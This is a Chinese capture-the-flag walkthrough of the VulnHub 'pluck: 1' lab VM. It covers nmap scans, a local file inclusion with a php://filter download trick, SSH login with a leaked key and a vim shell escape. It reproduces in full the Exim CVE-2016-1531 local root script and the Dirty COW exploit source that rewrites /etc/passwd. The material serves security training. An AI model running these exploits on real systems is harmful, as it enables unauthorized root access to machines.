vulnhub靶机渗透[pluck-1]

名称

名称:pluck: 1
发布日期:2017年3月11日

下载

pluck.ova.zip

  • Download (Mirror): https://download.vulnhub.com/pluck/pluck.ova.zip
  • Download (Torrent): https://download.vulnhub.com/pluck/pluck.ova.zip.torrent

描述

“享受” — @ryanoberto

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.121
Host is up (0.00016s latency).
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
1
2
3
4
5
6
root@kali:~# nmap -sV -p- -v 192.168.56.121
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
5355/tcp open llmnr?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
root@kali:~# nmap -A -p 22,80,3306,5355 -v 192.168.56.121 -T4 --script=vuln
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.121
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.121:80/admin.php
| Form id:
| Form action: admin.php
|
| Path: http://192.168.56.121:80/index.php?page=contact.php
| Form id: message
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin.php: Possible admin folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-passwd: Directory traversal found.
| Payload: "%2F%2Fetc%2Fpasswd"
| Printing first 250 bytes:
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Pluck</title>
|_<link rel="stylesheet" href="/css/bootstrap
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.56.121:80/search?forcedict=resolve%27%20OR%20sqlspider&q=define%2bresolve&ved=0ahUKEwiK9crGrc3RAhXpCsAKHYomC50Q_SoISDAA&sa=X
| http://192.168.56.121:80/search?forcedict=resolve&q=define%2bresolve%27%20OR%20sqlspider&ved=0ahUKEwiK9crGrc3RAhXpCsAKHYomC50Q_SoISDAA&sa=X
| http://192.168.56.121:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.56.121:80/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /admin.php, form's action: admin.php. Fields that might be vulnerable:
|_ email
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
5355/tcp open llmnr?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

端口80上的网站由PHP驱动,尝试了许多PHP技巧来检查漏洞,并发现该网站容易受到LFI和PHP base64-encode技巧的攻击!

1
http://192.168.56.121/index.php?page=/etc/passwd

现在得到了一个用户列表:

  • bob
  • peter
  • paul
  • backup-user

确实尝试过暴力破解,SQLi的管理员登录页面,但是运气不太好。

接下来,返回到用户列表,并尝试包含备份用户登录shell中提到的备份脚本。

1
2
3
http://192.168.56.121/index.php?page=/usr/local/scripts/backup.sh

#!/bin/bash ######################## # Server Backup script # ######################## #Backup directories in /backups so we can get it via tftp echo "Backing up data" tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null echo "Backup complete"

可以尝试包含tar文件,但这将是一团糟!因此,利用PHP base64编码技巧,通过对backup.tar文件的数据进行编码,然后剪切周围的HTML并在本地对其进行解码,来安全地下载文件。

1
2
3
4
5
6
root@kali:~/vulnhub/pluck-1# curl http://192.168.56.121/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2361k 0 2361k 0 0 32.0M 0 --:--:-- --:--:-- --:--:-- 32.0M
root@kali:~/vulnhub/pluck-1# ls
backup.tar64

base64解码生成backup.tar

1
2
3
root@kali:~/vulnhub/pluck-1# base64 -d backup.tar64 > backup.tar
root@kali:~/vulnhub/pluck-1# ls
backup.tar backup.tar64

最后进行解压缩操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~/vulnhub/pluck-1# mkdir backup ; tar -xvf backup.tar -C backup
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php
var/www/html/footer.php
var/www/html/css/
var/www/html/css/bootstrap.css.map
var/www/html/css/bootstrap.min.css.map
var/www/html/css/bootstrap-theme.css
var/www/html/css/bootstrap-theme.min.css
var/www/html/css/bootstrap.min.css
var/www/html/css/bootstrap-theme.min.css.map
var/www/html/css/bootstrap-theme.css.map
var/www/html/css/bootstrap.css
var/www/html/header.php
var/www/html/admin.php
var/www/html/js/
var/www/html/js/jquery.min.js
var/www/html/js/bootstrap.js
var/www/html/js/npm.js
var/www/html/js/bootstrap.min.js
root@kali:~/vulnhub/pluck-1# ls
backup backup.tar backup.tar64

解压缩文件后,注意到存在包含用户Paul SSH密钥的keys文件夹,将测试这些密钥,直到获得有效的SSH登录密匙

1
root@kali:~/vulnhub/pluck-1/backup/home/paul/keys# ssh paul@192.168.56.121 -i id_key4

在这种情况下,看到的是菜单类型的Shell登录,但是可以通过选择Edit file并输入任何文件名来退出该菜单,以开始使用vim。

输入下面的vim命令来设置shell

1
:set shell=/bin/bash

然后输入以下内容以跳至Bash shell

1
:shell

成功获取了shell

1
2
3
4
5
6
7
8
root@kali:~/vulnhub/pluck-1/backup/home/paul/keys# ssh paul@192.168.56.121 -i id_key4                                      
Last login: Thu Apr 9 07:55:00 2020 from 192.168.56.1

paul@pluck:~$ id
uid=1002(paul) gid=1002(paul) groups=1002(paul)
paul@pluck:~$ whoami
paul
paul@pluck:~$

提权

尝试使用内核漏洞进行提权,但是运气不好,但是在搜索SUID之后,可以注意到exim agent的存在。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

尝试了一些漏洞利用exim代理来提升权限,但不起作用,但是决定尝试一下此漏洞,因为版本差异很小,幸运的是,此漏洞起作用。

  • Exim-4.84-3-Local-Privilege-Escalation

exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

提权过程脚本内容

1
2
3
4
5
6
7
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

提权,成功获取到了flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
aul@pluck:~$ cat > /tmp/root.pm << EOF
> package root;
> use strict;
> use warnings;
> system("/bin/sh");
> EOF
paul@pluck:~$ PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
# id
uid=0(root) gid=1002(paul) groups=1002(paul)
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt

Congratulations you found the flag

---------------------------------------

###### ((((((((((((((((((((((((((((((
######### (((((((((((((((((((((((((((
,,########## ((((((((((((((((((((((((
@@,,,########## (((((((((((((((((((((
@@@@@,,,##########
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########
@@@,,,########## &&&&&&&&&&&&&&&&&&&&
,,,########## &&&&&&&&&&&&&&&&&&&&&&&
########## &&&&&&&&&&&&&&&&&&&&&&&&&&
####### &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

提权2

  • Linux内核2.6.22-3.9-Dirty-COW-/proc/self/mem-竞争条件提权-/etc/passwd方法

脏牛提权

40847.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016 Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software Foundation,
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
// -----------------------------------------------------------------

#include <iostream>
#include <fstream>
#include <string>
#include <thread>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
#include <pty.h>
#include <string.h>
#include <termios.h>
#include <sys/wait.h>
#include <signal.h>

#define BUFFSIZE 1024
#define PWDFILE "/etc/passwd"
#define BAKFILE "./.ssh_bak"
#define TMPBAKFILE "/tmp/.ssh_bak"
#define PSM "/proc/self/mem"
#define ROOTID "root:"
#define SSHDID "sshd:"
#define MAXITER 300
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
#define TXTPWD "dirtyCowFun\n"
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
#define EXITCMD "exit\n"
#define CPCMD "cp "
#define RMCMD "rm "

using namespace std;

class Dcow{
private:
bool run, rawMode, opShell, restPwd;
void *map;
int fd, iter, master, wstat;
string buffer, etcPwd, etcPwdBak,
root, user, pwd, sshd;
thread *writerThr, *madviseThr, *checkerThr;
ifstream *extPwd;
ofstream *extPwdBak;
struct passwd *userId;
pid_t child;
char buffv[BUFFSIZE];
fd_set rfds;
struct termios termOld, termNew;
ssize_t ign;

void exitOnError(string msg);
public:
Dcow(bool opSh, bool rstPwd);
~Dcow(void);
int expl(void);
};

Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
child(0){
userId = getpwuid(getuid());
user.append(userId->pw_name).append(":");
extPwd = new ifstream(PWDFILE);
while (getline(*extPwd, buffer)){
buffer.append("\n");
etcPwdBak.append(buffer);
if(buffer.find(root) == 0){
etcPwd.insert(0, root).insert(root.size(), pwd);
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
buffer.begin() + buffer.find(":", root.size()), buffer.end());
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
etcPwd.insert(0, buffer);
}else{
etcPwd.append(buffer);
}
}
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
extPwdBak->close();
fd = open(PWDFILE,O_RDONLY);
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
}

Dcow::~Dcow(void){
extPwd->close();
close(fd);
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
if(child != 0) wait(&wstat);
}

void Dcow::exitOnError(string msg){
cerr << msg << endl;
// if(child != 0) kill(child, SIGKILL);
throw new exception();
}

int Dcow::expl(void){
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
});
checkerThr = new thread([&](){ while(iter <= MAXITER){
extPwd->clear(); extPwd->seekg(0, ios::beg);
buffer.assign(istreambuf_iterator<char>(*extPwd),
istreambuf_iterator<char>());
if(buffer.find(pwd) != string::npos &&
buffer.size() >= etcPwdBak.size()){
run = false; break;
}
iter ++; usleep(300000);
}
run = false;
});

cerr << "Running ..." << endl;
madviseThr->join();
writerThr->join();
checkerThr->join();

if(iter <= MAXITER){
child = forkpty(&master, nullptr, nullptr, nullptr);

if(child == -1) exitOnError("Error forking pty.");

if(child == 0){
execlp("su", "su", "-", nullptr);
exitOnError("Error on exec.");
}

if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
memset(buffv, 0, BUFFSIZE);
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
cerr << "Received su prompt (" << buffv << ")" << endl;

if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
exitOnError("Error writing pwd on tty.");

if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
exitOnError("Error writing cmd on tty.");

if(!opShell){
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
exitOnError("Error writing exit cmd on tty.");
}else{
if(restPwd){
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd on tty.");
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd (rm) on tty.");
}

if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
exitOnError("Error getting terminal attributes.");

termNew = termOld;
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));

if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
exitOnError("Error setting terminal in non-canonical mode.");
rawMode = true;

while(true){
FD_ZERO(&rfds);
FD_SET(master, &rfds);
FD_SET(STDIN_FILENO, &rfds);

if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
exitOnError("Error on select tty.");

if(FD_ISSET(master, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) break;
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
exitOnError("Error writing on stdout.");
}

if(FD_ISSET(STDIN_FILENO, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
if(write(master, buffv, bytes_read) != bytes_read) break;
}
}
}
}

return [](int ret, bool shell){
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
if(ret <= MAXITER){cerr << msg; return 0;}
else{cerr << "Exploit failed.\n"; return 1;}
}(iter, opShell);
}

void printInfo(char* cmd){
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
cerr << " -h print this synopsis;" << endl;
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
exit(1);
}

int main(int argc, char** argv){
const char flags[] = "shn";
int c;
bool opShell = false,
restPwd = true;

opterr = 0;
while ((c = getopt(argc, argv, flags)) != -1){
switch (c){
case 's':
opShell = true;
break;
case 'n':
restPwd = false;
break;
case 'h':
printInfo(argv[0]);
break;
default:
cerr << "Invalid parameter." << endl << endl;
printInfo(argv[0]);
}
}

if(!restPwd && !opShell){
cerr << "Invalid parameter: -n requires -s" << endl << endl;
printInfo(argv[0]);
}

Dcow dcow(opShell, restPwd);
return dcow.expl();
}

此外UDP69端口开放也可以使用tftp下载backup.tar文件

知识点总结

  • 文件包含
  • php://filter/convert.base64-encode协议加密传输下载文件
  • ssh key 登录shell
  • vim命令设置shell并跳至shell
  • Exim-4.84-3-本地提权
  • 脏牛提权(dirty cow)
  • udp66端口tftp文件下载

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…